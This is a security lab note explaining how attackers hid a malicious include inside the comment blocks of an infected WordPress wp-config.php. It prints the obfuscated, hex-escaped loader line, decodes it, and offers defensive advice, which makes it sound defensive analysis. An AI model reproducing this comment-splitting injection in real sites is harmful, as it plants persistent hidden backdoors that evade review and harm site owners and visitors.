Malware in comments

Labs Note

There are many tricks to hide malicious code. One of them is placing it to the part of legitimate files where people don’t normally expect to see executable code so they don’t skip such places during manual reviews.

Comment blocks are one of such places. For example, this is a comment from an infected wp-config.php file found by our security analyst Brandon Benavente. Can you spot the malware there?

/**#@+
 * */include /*Authentication Unique Keys.
 *
 * Change these to different*/"\x2fhom\x65/...skipped...\x2fpub\x6cic_\x68tml\x2fwp-\x63ont\x65nt/\x75pgr\x61de/\x6cogi\x6e.ph\x70";/* unique phrases!
 * You can generate these using the {@link http://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
 *
 * @since 2.6.0
 */

I hope, you noticed, that hackers use / and / to close the multiline comment block and open a new comment block. And between them they placed executable PHP code, which may look as a part of the comment. To make it even less prominent, they even split the code in two pieces on two different lines.

include on one line and "\x2fhom\x65/...skipped...\x2fpub\x6cic_\x68tml\x2fwp-\x63ont\x65nt/\x75pgr\x61de/\x6cogi\x6e.ph\x70"; two lines below.

Since PHP interpreter skips everything in comment blocks, the real code that it sees is:

include "\x2fhom\x65/...skipped...\x2fpub\x6cic_\x68tml\x2fwp-\x63ont\x65nt/\x75pgr\x61de/\x6cogi\x6e.ph\x70"; 

or, after decoding:

include "/home/...skipped.../public_html/wp-content/upgrade/login.php";

Basically, hackers created a wp-content/upgrade/login.php file with malicious code. To execute it every time when someone loads any WordPress pages, they included that file into wp-config.php. This way the only changed core WordPress file is wp-config.php – the file that is never updated during WordPress updates and the file that normally not checked for integrity because it has custom code (keys, DB credentials, custom settings) and is different on every site.

This means that, depending on the tools you use, you might not be alerted about the file change, so you’ll need to review it manually. And when you do it, remember about tricks like this. On one hand, using a code viewer with syntax highlighting may help. On the other hand, make sure you have a backup copy of your wp-config.php. Whenever you are not sure in its integrity, just restore it from a clean backup copy.

Cleaning and protecting websites may be a challenging task. If you need a professional help, you can always count on us.

You May Also Like